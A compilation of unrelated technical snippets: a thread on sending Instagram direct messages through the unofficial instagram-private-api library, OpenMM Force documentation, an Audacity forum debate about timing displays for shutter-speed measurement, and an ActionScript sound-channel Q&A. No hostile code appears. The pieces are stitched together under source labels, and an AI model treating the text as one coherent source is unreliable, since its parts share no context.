Examples for sending direct messages?
Hi
In the API Readme, I see the following line:
Send direct messages or list direct messages in inbox
But I couldn't find example code or even the classes in the source
that I could use to send DMs.
Can someone help?
Thanks!
I've just thrown together this code by looking through IGDM (which uses this API):
const iClient = require("instagram-private-api").V1;
const device = new iClient.Device("myuser");
const storage = new iClient.CookieFileStorage(__dirname + "/myuser.json");
iClient.Session.create(device, storage, "myuser", "mypassword").then((session) => {
iClient.Thread.getById(session, "messageid").then((thread) => {
thread.broadcastText("Hello World!").then((threadWrapper) => {
console.log(threadWrapper);
});
});
});
Hi Jake,
Thanks for the example.
Can you also give me an example for getting the direct messages sent by the other person?
Thanks in advance
In the thread object you can do thread.items to get all of the chat message objects. I've done this so far:
thread.items.forEach((message) => {
  console.log(`${message._params.text} from ${message._params.userId}`);
});
Thanks much, Jake.
Can you tell me what is the 'messageid' parameter that you have mentioned in,
iClient.Thread.getById(session, "messageid").then((thread) => {
Thanks
Is there any way I can get only the direct messages sent by the other person, not by me? I want to get only the last direct message from my friend.
Thanks in advance
You can get your 10 most recent chats by doing:
var chats = new iClient.Feed.Inbox(session, 10);
chats.all().then((latestchats) => {
latestchats.forEach((chat) => {
console.log(chat.id);
});
});
And for your other question, each chat object has the ID of the user who has sent the message. I think it's something like message._params.userid you could then use an if to only select messages with your friend's ID.
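Putting those together, a rough sketch (friendId and threadId are placeholders, and the exact property name may be userId or userid depending on the version):

const friendId = 1234567890; // placeholder: your friend's numeric user ID
iClient.Thread.getById(session, threadId).then((thread) => {
  // Keep only the messages authored by the friend.
  const theirs = thread.items.filter(
    (message) => message._params.userId === friendId
  );
  if (theirs.length > 0) {
    // Assuming the first item is the most recent; verify in your version.
    console.log(theirs[0]._params.text);
  }
});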
Hope this helps.
Hello,
I got the error below and I cannot figure out where I should start debugging my code:
Unhandled rejection NotFoundError: Page wasn't found!
I used the above example to test sending a message to myself.
Regards,
Ali Ahmed Nada
|
GITHUB_ARCHIVE
|
More specifically, a Force object can do any or all of the following:
Add a contribution to the force on each particle
Add a contribution to the potential energy of the System
Modify the positions and velocities of particles at the start of each time step
Define parameters which are stored in the Context and can be modified by the user
Change the values of parameters defined by other Force objects at the start of each time step
Forces may be organized into “force groups”. This is used for multiple time step integration, and allows subsets of the Forces in a System to be evaluated at different times. By default, all Forces are in group 0. Call setForceGroup() to change this. Some Force subclasses may provide additional methods to further split their computations into multiple groups. Be aware that particular Platforms may place restrictions on the use of force groups, such as requiring all nonbonded forces to be in the same group.
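As a sketch of how force groups are typically assigned for multiple time step integration (the group numbers here are arbitrary, not mandated by the API):

#include "OpenMM.h"
using namespace OpenMM;

// Put the nonbonded force in group 1 so an integrator that supports force
// groups can evaluate it on a different schedule from the bonded forces.
void assignGroups(System& system) {
    for (int i = 0; i < system.getNumForces(); i++) {
        Force& force = system.getForce(i);
        if (dynamic_cast<NonbondedForce*>(&force) != NULL)
            force.setForceGroup(1);
        else
            force.setForceGroup(0);
    }
}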
Subclassed by OpenMM::AmoebaGeneralizedKirkwoodForce, OpenMM::AmoebaMultipoleForce, OpenMM::AmoebaTorsionTorsionForce, OpenMM::AmoebaVdwForce, OpenMM::AmoebaWcaDispersionForce, OpenMM::AndersenThermostat, OpenMM::ATMForce, OpenMM::CMAPTorsionForce, OpenMM::CMMotionRemover, OpenMM::CustomAngleForce, OpenMM::CustomBondForce, OpenMM::CustomCentroidBondForce, OpenMM::CustomCompoundBondForce, OpenMM::CustomCVForce, OpenMM::CustomExternalForce, OpenMM::CustomGBForce, OpenMM::CustomHbondForce, OpenMM::CustomManyParticleForce, OpenMM::CustomNonbondedForce, OpenMM::CustomTorsionForce, OpenMM::DrudeForce, OpenMM::GayBerneForce, OpenMM::GBSAOBCForce, OpenMM::HarmonicAngleForce, OpenMM::HarmonicBondForce, OpenMM::HippoNonbondedForce, OpenMM::MonteCarloAnisotropicBarostat, OpenMM::MonteCarloBarostat, OpenMM::MonteCarloFlexibleBarostat, OpenMM::MonteCarloMembraneBarostat, OpenMM::NonbondedForce, OpenMM::PeriodicTorsionForce, OpenMM::RBTorsionForce, OpenMM::RMSDForce, OpenMM::RPMDMonteCarloBarostat
void setForceGroup(int group)
Set the force group this Force belongs to.
Parameters: group – the group index. Legal values are between 0 and 31 (inclusive).
const std::string &getName() const
Get the name of this Force. This is an arbitrary, user-modifiable identifier. By default it equals the class name, but you can change it to anything useful.
void setName(const std::string &name)
Set the name of this Force. This is an arbitrary, user-modifiable identifier. By default it equals the class name, but you can change it to anything useful.
virtual bool usesPeriodicBoundaryConditions() const
Returns: true if the Force uses periodic boundary conditions, or false if it does not
|
OPCFW_CODE
|
I'm abusing Audacity to measure the shutter speeds of analogue cameras with a phantom-powered photodiode connected to an audio jack. This works great with Audacity 2.x down to speeds of 0.002 seconds (1/500th). For faster shutter speeds I still have to use version 1.x, because its Selection timeline shows me exact values down to microseconds (like shown here: [Link flagged by Google as dangerous]). So, could you please add a microseconds option in the dropdown menu of future Audacity versions? (And yes: I'm too lazy to calculate them from the values given in the upper Timeline.)
I’ve removed the link because your website is flagged by Google as malware.
Images may be uploaded directly to the forum using the “upload attachment” option below the message composing box.
I presume that you realise that Audacity 1.x can’t actually measure microseconds?
The smallest unit of time in digital audio is 1 sample period. At the default sample rate of 44100 Hz, that is about 23 microseconds.
If you set the sample rate to, say 100,000 Hz, then 1 sample period = 10 microseconds. The time / duration in samples can be read from the Selection Toolbar (http://manual.audacityteam.org/o/man/selection_toolbar.html). Calculating the time in microseconds (to the nearest 10 microseconds) is then very simple arithmetic.
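That arithmetic is just a scale factor. In Python, for instance:

# Convert a sample count to microseconds at a given sample rate.
def samples_to_microseconds(samples, rate_hz):
    return samples * 1_000_000 / rate_hz

print(samples_to_microseconds(2, 96000))   # ~20.83 microseconds
print(samples_to_microseconds(2, 100000))  # 20.0 microseconds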
“I presume that you realise that Audacity 1.x can’t actually measure microseconds?”
- Wrong. It converted the number of samples at the given sample rate into microseconds, and not just into rounded milliseconds like 2.x does (at least in the Selection Toolbar) (see attached image).
Quote: “Calculating the time in microseconds (to the nearest 10 microseconds) is then very simple arithmetic.”
And that is exactly what Audacity 1.0 did automatically, and what I was asking for. Nothing more.
Doing the (in my case) “samples × 1/96000” conversion all the time is not a matter of “simple arithmetic” but much more of an annoyance. Nevertheless, thank you again for your efforts.
(In addition / off topic: the linked homepage is not mine. I'm sorry if the image I linked to could contain malware. But trusting Google on malware, when they withhold essential security/control settings from their Android systems, and, even worse, letting them censor "your" internet… I didn't know that Google is the new internet police now, too.)
At 96000 Hz sample rate, 1 sample period is 10.41666666… microseconds.
Select 1 sample; that's just over 10 microseconds. Select 2 samples and that's about 21 microseconds. You can't select 11, 12, 13 … 19, 20 microseconds of audio, so that's not what I would call "microsecond accuracy".
Any reason to not use a sample rate of 100,000 Hz and make life easier for yourself? Just set it as the Project Rate (lower left corner of the main Audacity window) before you start recording, or if the audio is pre-recorded, use “Tracks > Resample” to convert it to 100,000 Hz.
As Joe Jack says, you can exactly select 11,12, 13 … microseconds in 1.x. Set 100000 Hz Default Sample Rate (just so you can navigate microseconds easier), generate a tone, zoom in to maximum, press HOME, then drag with your mouse or nudge the cursor using RIGHT arrow and look at the Status Bar.
It’s no use for exporting less than a sample of audio, but you can measure less than a sample worth of microseconds and you can read the length of a selection in microseconds without calculating.
The status bar is changing, and so is the selection on the Time bar, but the audio selection is not moving until you jump to the next sample. The information is band-limited to half the sample rate and quantized to sample periods. With a sampling rate of 96000 Hz it cannot be determined if an event occurred at 3.000001 seconds or 3.000002 seconds, just that it occurred in that 10.4 microsecond period (assuming that the hardware is capable of that accuracy). I like the varied scientific and engineering applications for Audacity, but primarily Audacity is designed for audio.
Can you write more words about “band-limited” in this context?
Are there not always going to be compromises if you show finer divisions than a sample?
If we were concerned not to show finer divisions than a sample, then a format including microseconds could have Selection Toolbar digits that only moved in increments of multiple microseconds as appropriate to the sample rate. But I think you would still get people complaining about a missing “feature”.
I still think that misses the point of the requests.
There seems to have been no discussion about why microseconds was removed.
Suppose one does scientific experiments with “audio” at 1,000,000 Hz so that each sample is one microsecond?
Here’s a signal that rises from silence to -2 dB in 1 microsecond:
This is the same signal that has been band-limited to 48000 Hz:
and this is the same signal that has been quantized to sample values at a sample rate of 96000 Hz:
Looking at the Timeline (not shown) I can see that the signal rises at “about” 0.085305 seconds (I’d judge it to be somewhere between 0.08530 and 0.08531 seconds). Even with a microsecond scale I’d still not be able to judge the rise time any more precisely than that.
As I was suggesting, converting from samples to time in microseconds becomes trivial mental arithmetic.
PCM digital audio is always band limited to half the sample rate. That’s how Harry made his name.
The human hearing range is (generously) quoted as 20 to 20,000 Hz. Harry Nyquist, with contributions from Claude Shannon, proved that frequencies can be precisely defined up to half the sample rate. Beyond half the sample rate it is "anybody's guess" (aka "undefined"). Scientifically (which I think is what we are talking about) it makes no sense to "measure" to an accuracy greater than a single sample period, because quantizing defines the smallest meaningful unit.
In real life, measurements will always be somewhat less accurate than defined by theory.
That’s perfectly true, but why make life more difficult? If you want measurements in microseconds or tens of microseconds you can make it simple by using an “easy” sample rate,
Why worry about common audio sample rates if we’re not working with audio?
I was unsure whether Audacity would work with a sample rate of 1 million samples per second. It does.
Does the hardware being used have a bandwidth up to 500,000 Hz?
For frequencies above 20 kHz we are not talking about “audio”.
If you only consider the quantizing part, then you might expect the signal in the first image to be quantized like this:
but that is not what happens, (because of the band limiting).
but it’s still pretty meaningless to give measurement units that are several orders of magnitude more “precise” than the equipment. As an example, there would be no point for an electronic tuner to display pitch to hundredths of a cent, or a wooden ruler with inches marked as 1.000000, 2.000000, 3.000000 …
I think there is a reasonable case for adding one more decimal place, but where do we draw the line? What if someone requests nanoseconds or picoseconds?
Why not user-defined formats, such as e.g. in Excel?
You’d enter a string and the time would be displayed accordingly. There had to be some predefined characters, of course.
where H=hours, M=minutes, S=seconds, CS=centi-seconds and s=samples
One placeholder means that the value is only written when there’s a non-zero value at this place or in front of it.
00:05:33 → 5:33
01:00:33 → 1:00:33
Two characters would always fill up the leading zeros.
The three dots in the parentheses mean that the samples are displayed for everything after seconds, i.e. they skip hours, minutes and seconds.
This could translate 30 min, 12 sec and 22050 samples as
We could of course stick to a simpler definition where all placeholders just have their constant cells, e.g.
“H:M:S” gives 00:00:00
Only the value in front is different because it can go higher than normal, i.e. hours would go over 24 when there’s no “D” in front.
However, I would like to have different formats at the same time, for instance Pal and Ntsc frames (e.g. “NF ↔ PF”).
Text or separators could be quoted explicitly or have an indicator in front (such as @).
I’ve not thought much about the implementation, but user defined formats could include bars, beats and sub-beat divisions, or 4, 5, 6, 7… decimal places of a selected unit. Anyone want to generate a tone with a 0.008333333 hour duration?
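To make this concrete, here is a minimal Python sketch of the simpler “constant cells” variant (the field behaviour is my assumption, not an existing Audacity spec):
# Format a time in seconds according to a simple "H:M:S"-style string,
# where each placeholder is a fixed two-digit field.
def format_time(total_seconds, fmt="H:M:S"):
    h, rem = divmod(int(total_seconds), 3600)
    m, s = divmod(rem, 60)
    fields = {"H": f"{h:02d}", "M": f"{m:02d}", "S": f"{s:02d}"}
    return ":".join(fields[c] for c in fmt.split(":"))

print(format_time(333))   # 00:05:33
print(format_time(3633))  # 01:00:33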
|
OPCFW_CODE
|
// The logic to get a gene's values for all clusters to add to the
// cell type worksheet.
import { get as rxGet, set as rxSet } from 'state/rx'
import fetchData from 'fetch/data'
import { addGeneBubbles } from 'cellTypeWork/transformToBubbles'
import { geneAlreadyThere } from 'cellTypeGene/ctgTable'
import dataStore from 'cellTypeWork/dataStore'
import { USE_TEST_DATA } from 'cellTypeSheet/sheetList'
const DOMAIN = 'cellTypeGeneClusters'
const testData =
`stat 1 2 3
color_by 0 0.6357 -0.4
size_by 0.8606 0.74 0.4`
const receiveDataFromServer = (data) => {
const error = rxGet(DOMAIN + '.fetchMessage')
if (error !== null) {
alert(error)
} else {
addGeneBubbles(data)
}
// Get the next gene in the list.
getGenesForAllClusters()
}
// A test stub in place of server query.
const fetchTestData = (id, url, receiveFx) => {
rxSet('cellTypeGeneClusters.fetchStatus.waiting')
rxSet('cellTypeGeneClusters.fetchMessage.set', { value: 'waiting for data...' })
setTimeout(() => {
receiveFx(testData)
rxSet('cellTypeGeneClusters.fetchMessage.clear')
rxSet('cellTypeGeneClusters.fetchStatus.quiet')
}, 1000)
}
const getGeneForAllClusters = (gene) => {
// Request one gene's data for all clusters.
const colorBy = dataStore.getColorBy()
const sizeBy = dataStore.getSizeBy()
let url =
'/user/' + dataStore.getSourceUser() +
'/worksheet/' + dataStore.getSourceWorksheet() +
'/gene/' + gene +
'/color/' + colorBy +
'/size/' + sizeBy
let options = { credentials: true, responseType: 'text' }
if (USE_TEST_DATA) {
fetchTestData('cellTypeGeneClusters', url, receiveDataFromServer)
} else {
fetchData('cellTypeGeneClusters', url, receiveDataFromServer,
options)
}
// Save the gene selected.
rxSet('cellTypeGene.geneSelected.uiSet', { value: gene })
}
const getGenesForAllClusters = () => {
// Request the data for a list of genes for all clusters.
const genes = rxGet('cellTypeGeneClusters.filterText')
if (genes.length < 1) {
return
}
// Pull the first gene out of the genes string.
let gene = genes
const index = genes.indexOf('\n')
if (index > -1) {
gene = genes.slice(0, index)
}
// Get the gene data if it is not in the worksheet.
if (!geneAlreadyThere(gene)) {
// We can only track one fetch at a time for a gene add,
// so request the data in multiple fetches, one per gene.
// Fetch the first gene only. The receiveDataFromServer function will
// call this again.
getGeneForAllClusters(gene)
}
// Remove this gene from the list.
rxSet('cellTypeGeneClusters.filterText.shift')
}
export { getGeneForAllClusters, getGenesForAllClusters }
|
STACK_EDU
|
That was a long blogging break, wasn't it? I just realized I haven't posted here in 7 months. I have an excuse for 4 of them: I was at the Signal Basic Officer Leadership course at Fort Gordon, GA. It was a good learning experience, I got my Security+, improved my public speaking skills, made some good friends, and learned quite a bit about satellite and radio communications. Since returning home, I've also completed the first half of my CCNA - becoming CCENT certified in the process. I've been working at Varrow, a VAR in Greensboro, since July and I am loving it. We are wrapping up moving the Greensboro office to a new location and then I will be responsible for their in-house lab infrastructure in Greensboro. There are a lot of really skilled engineers and businesspeople at Varrow and everyone is really approachable and helpful. One cool thing they've got going on is their blog network, which is a syndication of technical and business blogs from individuals within the company. Notice the nifty little icon in the top right corner of my blog, feel free to use it if you want to poke around and possibly even learn some stuff.
Now onto the nerdy stuff - NetScaler quirkiness. For those of you not familiar, a NetScaler is a network device (or VM) made by Citrix, that sits in between your network segments and provides load balancing, VPN, and firewall services. You can also do things like SSL offload, HTTP acceleration via caching/compression, as well as stuff like rule based content switching. The full feature set of the NetScaler is too long to list here, nor do I have the knowledge required to explain it all, but suffice it to say that the NetScaler is an extremely powerful device. One common use for the NetScaler is to slap it in front of a web server farm and let it load balance for you; it will detect if one of them drops out from under you and exclude it from the load balance, and it's pretty easy to set up. This is the scenario we were working with when the quirkiness started.
The NetScaler uses what they refer to as a Virtual IP address in order to provide load balancing. You arbitrarily configure the NetScaler with an additional IP address on the subnet you desire, you then link that IP to a service which you provision (in this case HTTP), you then link that service to corresponding servers (the web servers in our example). The NetScaler then uses whatever criteria you define to monitor the backend servers and verify that they are up, if one goes down it excludes it from the load balance. These monitors can be as simple as a ping, or as complex as a dedicated http request with specific content required in the response. Here is what the configuration looks like according to Citrix:
For our quirkiness example, we are going to assume a NetScaler is already configured as depicted above and that it sits behind a firewall or router. What we want to accomplish is moving the configuration over to a new NetScaler without taking any longer of an outage than necessary; let's say we are upgrading to a beefier model NetScaler and that's why. What we do is, via the CLI, copy all of the configuration commands for the virtual IPs, services, and backend servers off of the original NetScaler, into a text file. We then alter the virtual IPs to something other than the production numbers as a placeholder so as not to step on the production device's toes, and then issue the modified commands to the new NetScaler via the CLI. This creates an almost identical replica of our load balance from the original device on the new device. When it's cutover time, all you do is change the virtual IPs to match the production numbers, remove the production virtual IPs from the old device, and the traffic will start passing through the new NetScaler; if you have issues, you can easily revert.
Here's where it gets problematic. What if you unintentionally put a production virtual IP in the new device? It takes over that IP, and if the configuration isn't complete (imagine if you had SSL offload, content switching rules, etc. to configure as well), it also takes down the service. So, no problem, just remove the virtual IP and you should be good, right? Wrong. The problem is twofold: partially because of the NetScaler, partially because of the way layer 3 network devices learn MAC addresses. Here's a crash course on layer 3 devices and ARP (Address Resolution Protocol) tables for the uninitiated, skip this if you are already familiar:
An ARP table is what is used by layer 3 network devices (including your computer!) to figure out where on its LAN a frame needs to go to reach its intended destination. When a device like a router gets a packet intended for a specific IP address on one of its LANs, it looks up the IP address in its ARP table (which consists of a list of IP addresses and their corresponding MAC addresses). If it doesn't have an entry for that IP, it broadcasts an ARP request to find the proper MAC for the corresponding IP. It then sends the frames to the corresponding MAC address. Switches within the network then use their MAC tables to figure out which interface to switch the frame out of, and the frame can be delivered to the desired endpoint. If it's a device like a computer and the IP addresses are on the same LAN, the computer will store an ARP cache entry and send frames directly to the desired endpoint.
Back to our example. When a virtual IP is configured on the NetScaler, it sends out an ARP announcement saying pretty much, "hey, I've got this IP address on this MAC address!" To make matters worse, it does this on every connected interface, presumably every subnet in your network. Relevant network devices (including your computer and your router/firewall) then update their ARP tables to reflect the announcement. So, in our example, when we misconfigured the IP on the new NetScaler, the new NetScaler told our router/firewall that it had that IP. What it does not do is let everyone know that it no longer has the address when we remove it. Since we never removed and re-added the address to the old NetScaler, it doesn't ever send a new ARP announcement either, and to my knowledge does not send out periodic ARP refreshes either (at least not frequently). What we are left with is an ARP table entry on our router/firewall (and possibly our computer) with the wrong MAC address, and a new NetScaler that no longer responds to that IP, AKA a broken service; nobody can access the website internally or externally.
To anyone with any sort of networking knowledge, the solution is simple: clear the ARP cache on the router/firewall. In the Cisco world this is done with a simple clear arp-cache from privileged exec mode. If you have hosts on the same network segment as one of the NetScaler's interfaces (meaning traffic to that interface is not being routed) then you will want to clear each host's ARP cache as well (netsh interface ip delete arpcache from a command prompt in Win7). Once this is done, the service should be fixed, since the layer 3 devices will now issue an ARP request for the desired IP and find the old NetScaler next time someone tries to hit the service. Long story short, be careful when you are working with devices that arbitrarily snatch up IPs, especially in a production environment.
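For reference, the two cache-clearing commands mentioned above, roughly as you'd type them (exact syntax can vary by platform and OS version):
clear arp-cache                        (Cisco IOS, from privileged exec mode)
netsh interface ip delete arpcache     (Windows 7, from an elevated command prompt)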
|
OPCFW_CODE
|
KompoZer 0.8b2 is finally ready. Few visible changes, but a lot of bugfixes and code cleaning under the hood.
You can grab KompoZer 0.8b2 here: http://kompozer.net/download.php
Enjoy, and please report bugs!
We’ve tried to solve the most frequently reported bugs:
- the CSS Editor shouldn't add those annoying “*|” strings in the selectors any more
- the preview in the “Image Properties” box now works properly
- better FTP support (right-click in the Site Manager context menu)
- the markup cleaner doesn't crash on nested lists any more
- Enter in a paragraph now creates a new paragraph
- the “Credits” panel in the About box is back ;-)
KompoZer 0.8b2 is now a more reliable editor: the regressions in the CSS editor were a complete blocker for myself, so I guess it’s been a real nightmare for most users. We’ve fixed a lot of small bugs and I think the overall user experience should be much better than with the previous versions.
18*4 Localized Binaries
Cédric Corazza, our l10n lead, has done a great job to release localized binaries for all the supported languages at once. This time he’s had much more work than for the previous beta:
- we had 9 locales for the 0.8b1 release, there are 18 locales for 0.8b2:
- Catalan, Dutch, Hungarian, Japanese got ready after the 0.8b1 release
- Simplified Chinese, Esperanto, Finnish, Portuguese, Upper Sorbian have been added for the 0.8b2
- Cédric has made Windows™ installers, which should put an end to one of the most frequent feature requests
- he’s built all binaries manually, as we don’t have any kind of script to ease this task (I considered that as a typical “l10n lead job”)
Cédric, congrats! and go get some sleep, the Korean and Bulgarian locales are getting ready. ;-) I’ll definitely write a few scripts to ease your work for the next release.
Inline Spell Checker
The inline spell checker in KompoZer 0.7.10 was inherited from Nvu, it was implemented with a specific patch against the Gecko 1.7 core and it caused a lot of freezes and crashes. As a result, most users (including myself) disabled it and I didn’t see it as an important feature to bring back in KompoZer 0.8.
As you can guess, a lot of users had a very different opinion on this. :-)
Unlike Gecko 1.7, Gecko 1.8.1 has a very good built-in inline spell checker. I’ve had a look at Thunderbird’s code and I found out enabling the inline spell checker in KompoZer was a snap. I’m sorry I didn’t do it sooner — but now it’s done, and it’s working fine as far as I know.
DOM Explorer Sidebar
I’m working with Fabien ’Kasparov’ Rocu on the next version of the DOM Explorer. As Fabien is implementing his ideas in an extension, I had to clean up the DOM Explorer and add a few hooks for his addon. To ease the development of his add-on, we’ve decided to implement a part of his work directly in KompoZer 0.8b2:
- the DOM Explorer now shows the HTML attributes of the current element
- a double-click on an element in the DOM Explorer brings up its “Property” dialog
The real improvement will come with Fabien’s extension, which should be released in April 2010. I’ll come back to this in another blog post.
New Keyboard Shortcuts
I’m known to be a dangerous pervert when it comes to computer keyboards — I admit I hate having to use a mouse when I’m editing a text. These new keyboard shortcuts aren’t documented, you can see them as a hidden bonus:
- Ctrl+(Up|Down) moves the caret to the (beginning|end) of the current element
- Ctrl(+Shift)+Enter adds a new line after (before) the current element
- Alt+Shift+Enter switches to “Source” view
The Ctrl+Up/Down shortcut is more than a productivity booster. One of the known problems of the Mozilla editor component is that in some situations, it can be difficult to put the caret where you want it: for instance, there’s no easy way to put the caret right after a <div> block if it’s the last block in the page. With KompoZer 0.7.10 you had to select the <div> in the status bar, press the right arrow and hit Return; now all you need is to do a Ctrl+Down.
The “Source” View Still Sucks…
…and I’m aware of that. Please configure KompoZer to use your favorite text editor to work on the HTML source, there’s a specific “HTML” button by default in the main toolbar for that. I can’t help it, I hate the “Source” view in Nvu and KompoZer 0.7:
- I don’t see much point in a pseudo syntax highlighting that doesn’t update as you type
- I don’t see any point in showing line numbers that don’t match the *real* line numbers in the HTML file
- nobody understands why the “Source” view hides the document tabs
- it was the main source of crashes for KompoZer 0.7
The SeaMonkey-like plaintext editor, in my opinion, is much better at the moment — and on my first trunk builds (KompoZer 0.9a1pre / Gecko 1.9.3), Bespin is already working quite well.
Again, I understand a lot of users have a very different opinion on this, so I’ve tried an interesting experiment with this “Source” view: basically, I’ve re-written the main <tabeditor> element so it includes its own source editor. This embedded source editor could be used either for the “Split” view or for the “Source” view, and I could switch to “Source” mode without losing the document tabs.
Unfortunately, this new <tabeditor> element raised a few problems that I couldn’t solve easily for this 0.8b2 release, so I’ve had to revert to the good old plaintext editor. For the 0.8b3 I’ll probably re-implement an Nvu-like “Source” view, rather than spending too much time on a feature that won’t work as well as Bespin: I prefer to release KompoZer 0.8 sooner in order to propose a Bespin-based KompoZer 0.9 as soon as possible.
The HTML Serializer Still Sucks…
…but we’re working on it. As you may have noticed, the HTML output of KompoZer 0.8 is already much cleaner than the one we had in KompoZer 0.7, especially if you check the “reformat HTML source” option: the most visible point is, there are (almost) no empty lines any more in the output files. But your well-defined indentation is still destroyed by KompoZer, which is a real pain when switching to “Source” mode.
Of course, you can use HTML Tidy as a workaround; I even used to design an Nvu extension for that. But this means dealing with temp files, serializing the files twice (once with KompoZer + reformatting with Tidy), and risking data losses (especially in utf-8, don’t ask me why). And the HTML code in the “Source” view is still a mess.
The great news is, Laurent Jouanneau has backported his XHTML serializer to Gecko 1.8.1 so I could use it for KompoZer 0.8 — and the first results look great! See this small example I saved with KompoZer 0.7.10, KompoZer 0.8b2 and KompoZer 0.8b3pre. Looks like we can finally get rid of HTML Tidy!
There are four main points to address before we can release a third (and hopefully last) beta:
- adapt KompoZer 0.8 to the new HTML serializer;
- get some kind of colored source view working;
- fix the bugs in the “Split” view so people start using it;
- work on FTP support to replace the current “Publish” button.
Please test this new version and report bugs. Many thanks to all users who donated or gave some time to keep this project running!
|
OPCFW_CODE
|
Many good conversations about cryptography have ended badly after someone asks this: “How are you managing your keys?” Bad key management undermines even the best cryptography.
Why? Because if the bad guy gets the key and the encrypted data, they get the unencrypted data. It’s as simple as that. There are three important things to consider in good key management: generation, storage, and communication of keys. Each of these are a field of study in and of themselves. We’ll provide a quick overview.
Key Management: Generation
Randomly generated keys are very secure, but they have to be stored somewhere. Be sure to use a cryptographically secure random number generator, not just any rand() function. Each algorithm requires keys of a specific size and shape. For AES, a completely random 128 or 256 bit key is appropriate. For RSA and ECC, a complicated mathematical relationship dictates the rules for key generation. Occasionally, we see internet-wide vulnerabilities because of a systematic non-randomness in key generation.
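For instance, a minimal Python sketch of generating a random 256-bit key from a cryptographically secure source:
import secrets

key = secrets.token_bytes(32)  # 32 bytes = 256 bits, e.g. for AES-256
print(key.hex())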
Key size varies greatly per algorithm and type of cryptography. Asymmetric keys are often much larger than symmetric keys. Compared to everything else, this is a relatively easy decision since the standard key sizes for most modern algorithms are secure.
You can also derive cryptographic keys from user-generated passwords. This is convenient because you don’t have to store them, but they are strictly less secure. Depending on how good the user is at thinking up passwords, they vary from “pretty secure” to “not secure.” Password-based key derivation is a good approach if the security of the cryptography and of the account are the same anyway. You must use a proper password-based key derivation function. We see too many instances where the password itself is truncated or padded to 128 bits and used as the key. That is a big no-no, because it makes it very fast to brute-force the key.
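As a sketch of what a proper derivation looks like, here is PBKDF2 via Python's standard library (the salt size and iteration count here are illustrative, not a recommendation):
import hashlib
import secrets

password = b"correct horse battery staple"
salt = secrets.token_bytes(16)  # store the salt alongside the ciphertext
key = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000, dklen=32)
# 'key' is now a 256-bit key; never just truncate or pad the raw password instead.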
Key Management: Storage
If you’re encrypting data for storage, it’s tempting to store the key in the same database as the encrypted data itself. This completely undermines the encryption. It’s just bad key management. A variation on this mistake is to put an encryption key in the code itself. This is OK if you want to add some slight obfuscation technique, but it is not encryption.
It is better to use a key management system like a hardware security module (HSM), hardware enclave, or Key Manager. For instance, on iOS and some versions of Android, there is a key management subsystem that programmers can use. It is tied to a hardware enclave used to protect the key from even root-level vulnerabilities. The user’s biometric or password unlocks the enclave, so the programmer doesn’t have to worry about that.
Key Management: Types of Key Storage Systems
Many key storage systems like hardware enclaves and HSMs provide two modes of operation: 1) Generate a key in the enclave and ask the enclave to perform your cryptography. This is nice because you never have to handle the (private) key again. It will not be hacked out of your application because your application doesn’t have it. 2) Generate a key in your application, ask the enclave to encrypt it, and store the encrypted key e.g. in your database. This isn’t as strong as option 1, but may be more convenient. Cloud services like AWS have HSM wrapper tools like KMS to make HSMs easier to use in this mode.
Not all of these systems support the same algorithms, so plan ahead. For instance, if you want to encrypt something in an HSM and decrypt it on a secure enclave in iOS, you need to make sure that they both support (and let the programmer access) the same algorithms. Most things support AES-GCM nowadays, but this is harder than it seems, particularly for asymmetric encryption, which varies more.
Registering and Communicating Keys
If there is any communication in your encryption, you will need a method for registering the key and for looking up which keys are associated with which users. This is a tricky part of key management; communicating a shared or public key presents a bootstrapping problem. This can be relatively easy to solve, such as a scheme where you send the user's public key during signup and store it in their user record. Or it can be relatively hard, such as a situation where two end users need to exchange keys without trusting any third party (such as the programmer!)
The bootstrapping problem: you need a secure communication channel to share the key, but you need to have already shared the key to establish a secure communication channel. There are a few strategies for this:
- Certificate Authority: This is the trust model of HTTPS, also known as Public Key Infrastructure (PKI).
- Trust on First Use: The first time you encounter the system or user, you trust the public or shared key. For instance, this is how SSH often works (when identifying the server) or when a user registers and sets their password or public key.
- Pre-Shared Key: The two systems can be given the same key, e.g. during the manufacturing process or during configuration.
- Out of Band Verification: For instance, two friends who want to communicate can call each other up on the phone, make sure they’re talking to the right person, and read their public keys to each other.
- Key Rotation: It’s worth mentioning at this stage that keys need to be rotated periodically, either because they have to be replaced after being used too many times (as with AES-GCM), because they got stolen by a bad guy, because they got lost, or because the algorithms changed. If you already have a secure channel established, you can often use that to rotate the key, but not if the key is lost.
User identity and authentication (password, biometrics, 2FA) isn’t strictly about the key management, but it’s caught up in all this. If your encryption relies on authentication (e.g. you release the user key when they log in) then encryption will only be as strong as your authentication no matter your approach to key management. Depending on your use case, that may be unavoidable, but keep in mind that authentication is typically orders of magnitude weaker than encryption. Additionally, you should consider that your attacker can circumvent authentication.
Have questions about Key Management? Contact the team at Tozny for information about how our TozStore platform takes care of key management for our clients. Better yet, schedule an appointment with one of our encryption experts to discuss your specific security needs!
|
OPCFW_CODE
|
Actionscript 3.0 sounds accounting
I have an Array of SoundChannels actively playing.
When new sound is going to play, I append its SoundChannel to this array.
I have to maintain such an array in order to be able to stop all sounds at once.
I would like to remove a sound channel from the array when it finishes, to prevent infinite growth of my array. But when I catch the Event.SOUND_COMPLETE event, I have no information on the sound channel. It is only possible to get the Sound as e.target.
Actually, I can maintain Array of pairs (Sound, SoundChannel).
But maybe there exists more light-weight solution?
you don't need that array :) you can just use SoundMixer.stopAll(); to stop every sound that is playing.
edit: since you want to stop all special sounds, i have a new solution.
first, you create a new actionscript class and you add this code to it.
package
{
import flash.display.DisplayObject;
import flash.events.Event;
import flash.media.SoundChannel;
// SoundChannel is a final class that only Sound.play() can create,
// so we wrap a channel instead of extending it.
public class SpecialSoundChannel
{
var _channel:SoundChannel;
var _parent:DisplayObject;
public function SpecialSoundChannel(Channel:SoundChannel, Parent:DisplayObject)
{
_channel = Channel;
_parent = Parent;
_parent.addEventListener("StopSpecialSound", stopChannel);
}
public function stopChannel(e:Event):void
{
//DO SOME OTHER STUFF YOU WANT DONE.
_channel.stop();
_parent.removeEventListener("StopSpecialSound", stopChannel);
}
}
}
every time you want to have a special sound added that is not music, you just do it like this:
var _special:SpecialSoundChannel = new SpecialSoundChannel(mySound.play(), this);
here mySound is the Sound you are playing, and "this" is the class where you play and stop your soundchannel, which i am assuming is the same as where you create your soundchannel and therefore can call it "this". You add the following function to that class.
public function stopSpecialSounds():void
{
var _e:Event = new Event("StopSpecialSound");
dispatchEvent(_e);
}
if you want to stop all special sounds, you just call for this last function.
Thanks for your answer. But I don't want to stop every sound. I need to stop only sounds from my array. For instance, there may be some music playing. And it must continue to play when I stop my sounds.
